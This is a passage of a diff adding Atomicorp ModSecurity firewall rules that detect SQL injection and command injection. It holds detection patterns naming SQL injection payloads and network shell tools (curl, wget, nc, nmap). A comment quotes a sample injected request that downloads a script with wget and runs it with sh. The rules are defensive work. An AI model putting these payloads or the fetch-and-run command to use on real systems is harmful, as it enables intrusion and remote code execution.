ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:/message/|!ARGS:content_en|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:data "(?:insert into values|select from [a-z|0-9]+!( and)|bulk insert |union select|union all select|convert \(.{1,256}from|select (?:load_file|char\(|\* from)|(?:insert|remark)test;)"  "phase:2,deny,log,auditlog,status:403,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,chain,id:340017,rev:49,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS',logdata:'%{TX.0}',tag:'SQLi'"
+SecRule REQUEST_URI "!(?:^/edit_page$|/node/[0-9]+/edit|^/forum/posting\.php|^/admins/wnedit\.php|modules\.php\?name=morums&file=posting&mode=|^/joomla/administrator/index2\.php|^/wiki/index\.php?.*action=submit|^/imp/compose\.php|^/horde/imp/compose\.php|/sql.php|/tbl_(?:change|s(?:ql|tructure))\.php|/admincp/template\.php\?do=(?:insert|update)template|admin/area/save-page\.php$|^/cgi-bin/cookmail\.exe$|^/catalog/secure_admin/categories\.php\?cpath=)"  "t:none,t:lowercase"
+
+# Rule 340144: Generic SQL sigs
+SecRule REQUEST_URI "!(?:(?:/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/horde3?/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(?:Downloads|Submit_News)|/admin\.php\?module=NS\-AddStory\&op=|/index\.php\?name=pnphpbb2&file=posting&mode=reply|/phpmyadmin/|/pnphpbb2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/node/[0-9]+/edit|/joomla/administrator/index2\.php|module=admin&act=dispLayoutAdminEdit&layout_srl=|upgrade.php?step=|^/ubbthreads/install/|^/projects/csb/milestone$|^/backoffice/index\.php\?controller=admintranslations|^/admin/applications/edit/)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:lowercase,id:340144,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2',chain,logdata:'%{TX.0}',tag:'SQLi'"
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|!ARGS:/body_/|!ARGS:shortcode|!ARGS:/description/|!ARGS:/sys_template/|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:body|!ARGS:/teaser/|!ARGS:/content/|!ARGS:wpSummary|!ARGS:ncontent|!ARGS:/installcode/|!ARGS:/database/|!ARGS:code|!ARGS:/report/|!ARGS:/database/|!ARGS:/text/|!ARGS:comment|!ARGS:/txt/|!ARGS:blogText|!ARGS:sendDescription|!ARGS:exec[text]|!ARGS:keywords|!ARGS:tiny_vals|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:/message/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:/^para/|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:/^info/|!ARGS:content|!ARGS:data|!ARGS:/^p_posts/|!ARGS:questions_detail "(?:\b(?:alter|drop)\b [a-z0-9]+ \b(?:column|database|procedure|table)\b|delete[[:space:]] .{1,100}+ update [a-z0-9]+ set .{1,100}+=|union all select |\bunion\b.{1,100}?\bselect\b.{0,200}[a-z0-9]+ from |select (?:load_file|char ?\()|(?:insert|remark)test;)|\bcreate\b table [a-z0-9]+ \("  "t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace"
+
+SecMarker END_SQL_CHECKS_2
+
+# Rule 340145: Generic SQL sigs
+SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:datafile|!ARGS:SAMLResponse|!ARGS:/cleandata/|!ARGS:FCKeditor|!ARGS:output|!ARGS:/^parabola_settings/|!ARGS:explanation|!ARGS:/^wp_meta_box/|!ARGS:/post/|!ARGS:product[name]|!ARGS:cookie|!ARGS:/^field\[6\]$/|!ARGS:UserData|!ARGS:serData|!ARGS:/^Cms_Page/|!ARGS:/^autoDS/|!ARGS:/^pages/|!ARGS:prefix|!ARGS:suffix|!ARGS:qa_answer|!ARGS:areas|!ARGS:templatecode|!ARGS:featured_ids|!ARGS:/teksti/|!ARGS:/^jform/|!ARGS:callforprice|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:condition|!ARGS:/^chronofield/|!ARGS:resolution|!ARGS:/desc/|!ARGS:/^cforms/|!ARGS:special|!ARGS:/email|!ARGS:/body/|!ARGS:/installcode/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/comment/|!ARGS:/content/|!ARGS:newcontent|!ARGS:/text/|!ARGS:/txt/|!ARGS:khxc_incphp--filename|!ARGS:/file_content/|!ARGS:filecontent|!ARGS:/message/|!ARGS:defaultParamList|!ARGS:body|!ARGS:gbu0_proddetdisp--incdisp|!ARGS:gbu0_prodcatdisp--incdisp "(?:or [0-9] ?= ?[0-9]|admin'(?: --| #)|or (?:'|\")? ?(?:0|1|2|3|a|b) ?(?:'|\")? ?= ?(?:'|\")? ?(/:0|1|2|3|a|b) ?(?:'|\")?|having 1 ?= ?1 ?--|null is null ?--| \b(\d+) ?(?:=|<>|<=>|\!=) ?[0-3]\b)" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:compressWhitespace,t:lowercase,capture,id:340145,rev:43,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}',tag:'SQLi'"
+SecRule REQUEST_URI "!(?:/index\.php/admin/catalog_category/save|(?:/admin/stats|/css/gallery-css)\.php\?1=1|/admin\.php\?tile=mail$|/catalog_category/save/key/|/\?op=admin_settings|^/\?openpage=|^/admin/extra|^/node/[0-9]+/edit\?destination=admin/content|^/administrator/index\.php\?option=com_chronoforms)" "t:none,t:lowercase"
+
+# Rule 390572: Generic SQL sigs
+SecRule ARGS|XML:/*|!ARGS:datafile|!ARGS:SAMLResponse|!ARGS:/cleandata/|!ARGS:serData|!ARGS:explanation|!ARGS:/post/|!ARGS:/^wp_meta_box/|!ARGS:cookie|!ARGS:/^field\[6\]$/|!ARGS:/^autoDS/|!ARGS:pagetext|!ARGS:featured_ids|!ARGS:/^pages/|!ARGS:/^Cms_Page/|!ARGS:qa_answer|!ARGS:/teksti/|!ARGS:areas|!ARGS:templatecode|!ARGS:/^jform/|!ARGS:callforprice|!ARGS:condition|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:prefix|!ARGS:pagetext|!ARGS:suffix|!ARGS:special|!ARGS:description|!ARGS:resolution|!ARGS:/^chronofield/|!ARGS:memo|!ARGS:/^cforms/|!ARGS:/email|!ARGS:/body/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/comment/|!ARGS:content|!ARGS:/descr/|!ARGS:newcontent|!ARGS:/text/|!ARGS:/txt/|!ARGS:/installcode/|!ARGS:/database/|!ARGS:khxc_incphp--filename|!ARGS:/file_content/|!ARGS:filecontent|!ARGS:/message/|!ARGS:defaultParamList|!ARGS:body|!ARGS:/^gbu0/ "(?:or.{1,100}1[[:space:]].{,100}=[[:space:]]1|or 1=[0-9]|admin'(?: --| #)| or '1'='1--|having 1 ?= ?1 --|or\+1=[0-9]|null is null ?--|(?:and|or) ?(\d+) ?(?:=|<>|<=>|!=) ?[1-3]\b)" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhitespace,capture,id:390572,rev:22,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}',tag:'SQLi'"
+SecRule REQUEST_URI "!(?:/(?:catalog_category|featured)/save|(?:/admin/stats|/css/gallery-css)\.php\?1=1|/admin\.php\?tile=mail$|/\?op=admin_settings|^/\?openpage=|^/node/[0-9]+/(?:edit|webform/))" "t:none,t:lowercase"
+
+# Rule 340146: Meta character SQL injection
+SecRule REQUEST_URI "(?:insert[[:space:]]+into.+values|select (\*|[a-z0-9]+) from.+[a-z|0-9|\{]|select.+from|bulk[[:space:]]+insert|union.+select|select (?:load_file|char\()|convert ?\(from|and.{1,256}char\(|(?:insert|remark)test ?;)" "phase:2,deny,log,auditlog,status:403,chain,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:lowercase,id:340146,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL metacharacter URI injection protection',logdata:'%{TX.0}',tag:'SQLi'"
+SecRule ARGS:boattype "!(^select)" "t:none,t:lowercase"
+
+
+SecMarker END_SQL_INJECTION_RULE_1
+
+####################### Second Set
+#
+
+SecRule TX:STATIC "@eq 1" "phase:2,id:'333801',pass,t:none,nolog,noauditlog,skipAfter:END_SQL_CHECKS_3"
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333801,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_3
+
+
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:SAMLResponse|!ARGS:contenido|!ARGS:/sql/|!ARGS:/^Cms_Page/|!ARGS:prefix|!ARGS:/database/|!ARGS:pagetext|!ARGS:query|REQUEST_HEADERS|!ARGS:/FCKeditor/|!ARGS:/narrative/|!ARGS:/insertstring/|!ARGS:templatecode|!ARGS:areas "@pm select outfile exec passthru serialize preg_ eval create_function create_function union concat file_put_contents" "phase:2,id:333802,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,multimatch,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333701,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_2"
+
+#shell code SQL injection
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/message/|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:pagetext|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:areas "(?:(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:system|create_function|create_function|eval ?\(|shell_exec|passthru|serialize|preg_\w+|exec).{1,100}?into)|select.{1,100}?(?:php|perl).{1,100}?into outfile|union select all|concat ?\(user_|insert into.{1,100}file_put_contents)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules: SQL injection with payload - base64 encoded',id:381025,rev:4,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
+SecMarker END_SQL_INJECTION_RULE_2
+
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:contenido|!ARGS:/sql/|!ARGS:/^Cms_Page/|!ARGS:prefix|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:query|!ARGS:/message/|!ARGS:/narrative/|!ARGS:areas|!ARGS:templatecode "@pm file_put_contents select outfile exec passthru serialize" "phase:2,id:333803,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334364,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_3"
+
+#PHP shell code SQL injection
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/insertstring/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:pagetext|!ARGS:/database/|!ARGS:areas "(?:(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:system|eval ?\(|shell_exec|preg_\w+|passthru|create_function|serialize|exec).{1,100}?into)|select.{1,100}?(?:php|perl).{1,100}?into outfile|insert into.{1,100}file_put_contents)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL injection with PHP/PERL payload - hex encoded',id:381026,rev:3,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
+SecMarker END_SQL_INJECTION_RULE_3
+
+#SQL inline command attack with more AE cases
+SecRule ARGS|XML:/*|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/teaser/|!ARGS:wpSummary|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:/insertstring/|!ARGS:areas|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:content|!ARGS:file_content|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:/message/|!ARGS:content|!ARGS:/report/ "@pm char execute convert delete insert select drop create table declare null accesslevel user_name concat( union case xecresultset ;set @ cast" "phase:2,id:333804,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:replaceComments,t:compressWhiteSpace,multiMatch,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334365,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_4"
+
+SecRule ARGS|XML:/*|!ARGS:/replaceAll/|!ARGS:areas|!ARGS:/^wpt_/|!ARGS:field_value_mapping|!ARGS:/post_code/|!ARGS:tHtml|!ARGS:/_dnn/|!ARGS:actionFilter|!ARGS:Error|!ARGS:code|!ARGS:thecode|!ARGS:param[DEFAULTVALUE]|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:data|!ARGS:resolution|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/^Cms_Page/|!ARGS:json|!ARGS:/php/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:fdata|!ARGS:file_content|!ARGS:/narrative/|!ARGS:data|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:/txt/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:description|!ARGS:/message/|!ARGS:/content/|!ARGS:comment|!ARGS:p_action|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and) {1,100}. char\([0-9]| \b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?;(?:insert|declare ?\@|varchar) ?|and .{1,100} \( ?select .{1,100} from |\bdrop\b {1,100}. table |(?:declare|convert) .{1,100} varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|\bconcat\(|union select |union all select|\bcast\b .{1,50}\( as |xecresultset|' ?; ?declare\b @|; ?set @|select (?:load_file|char\()|(?:insert|remark)test ?;|\bcreate\b table [a-z0-9]+ \()" "chain,phase:2,deny,log,auditlog,status:403,capture,id:340159,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:39,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,tag:'SQLi'"
+SecRule REQUEST_URI "!(?:/install/index\.php|/admin/fetch_data_af\.php\?action=create_txt_file_from_af_table$|/admin/structure/feeds/edit|^/([a-z]+/)?wp-admin/(?:admin|options-general)\.php\?page=wpsc-settings|/horde/services/ajax\.php/kronolith|^/\?option=com_easyblog|^/administrator/index.php?option=com_droptables|^/dev/node/|^/node/[0-9]+)" "t:none,t:lowercase"
+
+SecMarker END_SQL_INJECTION_RULE_4
+
+SecRule  REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:areas|!ARGS:templatecode|!ARGS:/narrative/|!ARGS:wpSummary|!ARGS:/database/|!ARGS:/text/|!ARGS:pass|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "@pm cast xecresults declare" "phase:2,id:333805,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334366,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_5"
+
+#SQL Injection cases
+SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:code|!ARGS:wpSummary|!ARGS:areas|!ARGS:templatecode|!ARGS:comment|!ARGS:/database/|!ARGS:/text/|!ARGS:pass|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:/message/|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:\bcast\b .{1.100} ?\(.{1,100} as |xecresultset|; ?declare\b ?\@)" "phase:2,deny,log,auditlog,status:403,capture,id:340164,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: SQL Injection Attack',logdata:'%{TX.0}',tag:'SQLi'"
+SecMarker END_SQL_INJECTION_RULE_5
+
+SecRule ARGS|REQUEST_URI|XML:/*|REQUEST_HEADERS|ARGS_NAMES|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:contenido|!ARGS:/report/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:/txt/|!ARGS:/narrative/|!ARGS:/text/|!ARGS:areas|!ARGS:templatecode "@pm = char( varchar execute convert delete insert declare select drop create table convert( null accesslevel user_name concat( union cast xecresultset" "phase:2,id:333806,t:none,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334367,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_6"
+#Always bad SQL injection case w/ antievasion
+#SecRule ARGS|!ARGS:/^fulltext/|!ARGS:message|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring]|!REQUEST_HEADERS:X-PageView "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" 
+SecRule ARGS|!ARGS:Db_submit|!ARGS:/installcode/|!ARGS:/^fulltext/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:wpSummary|!ARGS:query|!ARGS:message|ARGS_NAMES|!ARGS:/narrative/|REQUEST_HEADERS|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:comment|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring]|!REQUEST_HEADERS:X-PageView "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "phase:2,deny,log,auditlog,status:403,capture,id:340156,capture,t:none,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',logdata:'%{TX.0}',tag:'SQLi'"
+
+SecRule REQUEST_URI "(?:/install/index\.php|/index\.php\?mode=install&sub=create_table$|^/admin/test/examples/txtsqladmin/index\.php|^/store/images/|^/([a-z]+/)?wp-admin/(?:admin|options-general)\.php\?page=wpsc-settings|/horde/services/ajax\.php/kronolith)"  "phase:2,t:none,t:lowercase,id:344368,pass,nolog,noauditlog,skipAfter:END_RULE_340157"
+
+#SQL inline command attac
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_COOKIES|XML:/*|ARGS|!ARGS:article|!ARGS:/post_code/|!ARGS:error|!ARGS:thecode|!ARGS:/template/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/^Cms_Page/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/appendTo/|!ARGS:json|!ARGS:panels_data|!ARGS:field_value_mapping|!ARGS:data|!ARGS:areas|!ARGS:/^field_aut_content/|!ARGS:/^field_id/|!ARGS:actionFilter|!ARGS:post_excerpt|!ARGS:post_content|!ARGS:/^body/|!ARGS:response|!ARGS:/wp_autosave/|!ARGS:SAMLResponse|!ARGS:templatecode|!ARGS:contenido|!ARGS:/txt/|!ARGS:/text/|!ARGS:/teaser/|!ARGS:wpSummary|!ARGS:/narrative/|!ARGS:/installcode/|!ARGS:/php/|!ARGS:content|!ARGS:file_content|!ARGS:faqs_answer|!ARGS:/^para/|!ARGS:keywords|!ARGS:code|!ARGS:/sql/|!ARGS:prefix|!ARGS:data|!ARGS:/database/|!ARGS:/description/|!ARGS:alternate1|!ARGS:comment|!ARGS:body|!ARGS:fulldescr|!ARGS:article_content|!ARGS:query|!ARGS:/text/|!ARGS:txt|!ARGS:action|!ARGS:Db_submit|!ARGS:saved_data|!ARGS:form[pagina_text]|!ARGS:/message/|!ARGS:steps|!ARGS:fck_body|!ARGS:p_action|!ARGS:newcontent|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and)(\w+)char ?\([0-9]| \b(?:execute|convert) ?\(|; ?\bdelete\b.{1,100}?; ?(?:insert|declare @|varchar) ?|\bdrop\b .{1,100} table |(?:declare|convert) .{1,100} varchar\(|null ?, ?null ?, ?(?:accesslevel|user_?name) ?,|\bconcat\(|union select |union all select|xecresultset|' ?; ?declare\b ?@|; ?set @|select (?:load_file|char ?\()|(?:insert|remark)test;|\bcreate\b table [a-z0-9]+ \()" "phase:2,deny,log,auditlog,status:403,capture,id:340157,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0},%{matched_var_name}',tag:'SQLi'"
+SecMarker END_RULE_340157
+
+#additional SQL injection checks on cookies
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/   "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|\b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?; ?(?:insert|declare @|varchar) ?|and .{1,100} \(select |\b(?:drop|create)\b(\w+)table\b|(?:declare|convert) .{1,100} varchar\(|null ?, ?null ?, ?(?:accesslevel|user_?name) ?,|concat\(|union select |union all select|\bcast\b ?\(.{1,100} as |xecresultset|' ?; ?declare\b ?@|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "phase:2,deny,log,auditlog,status:403,capture,id:340181,t:none,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0}',tag:'SQLi'"
+SecMarker END_SQL_INJECTION_RULE_6
+
+SecMarker END_SQL_CHECKS_3
+
+SecMarker END_SQL_CHECKS_EVERYTHING
+
+############ COMMAND INJECTION RULES #########################
+
+#Needs work, too greedy
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:shortcodes|!ARGS:/content/|!ARGS:/scripttag/|!ARGS:/description/|!ARGS:/wp_autosave/|!ARGS:/html/|!ARGS:/text/|!ARGS:/message/|!ARGS:answer|!ARGS:affiliatelinks|!ARGS:body|!ARGS:/body/|!ARGS:/comment/|!ARGS:/signature/ "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" "phase:2,status:403,deny,id:393655,rev:15,t:none,t:urlDecodeUni,t:cmdLine,capture, msg:'Atomicorp.com WAF Rules: Possible Remote Command Execution: Unix Shell Expression Found',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'attack-rce',ctl:auditLogParts=+E,log,auditlog"
+
+SecRule REQUEST_URI|REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:fileContent|!ARGS:title|!ARGS:templatecode|!ARGS:areas|!ARGS:/template/ "@pm exec cmd cd ls pwd perl echo uname curl kill sh cp python chown rm rsync rdiff-backup wget ftpget links g++ chgrp chown passwd bash telnet wguest csh tcsh wsh fetch dash rcmd ftp cmd32 nmap net nc \# \| \; \` ping sleep benchmark || powershell" "phase:2,id:333807,rev:2,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,multimatch,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334368,t:none,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_1"
+
+#<!--#exec cmd
+SecRule REQUEST_URI|ARGS "<\!--#exec cmd" "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:cmdline,t:lowercase,id:393654,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - command injection in URL|ARGS blocked'"
+
+
+
+#command injection
+#/login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
+SecRule REQUEST_URI "\' ?; ?(?:(?:w|ftp)get|curl) " "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhitespace,t:cmdline,t:lowercase,id:393653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - command injection in URL blocked'"
+
+
+# Rule 340014:
+#Prevent command injection through cookies
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:fileContent|!ARGS:message|!ARGS:message_html|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:/template/|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?: ?(?:\bcurl\b|(?:w|ftp)get) (-l )?(?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:340014,rev:19,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection',logdata:'%{TX.0}',tag:'Command Injection'"
+SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"
+
+# Rule 340014:
+#Prevent command injection through cookies
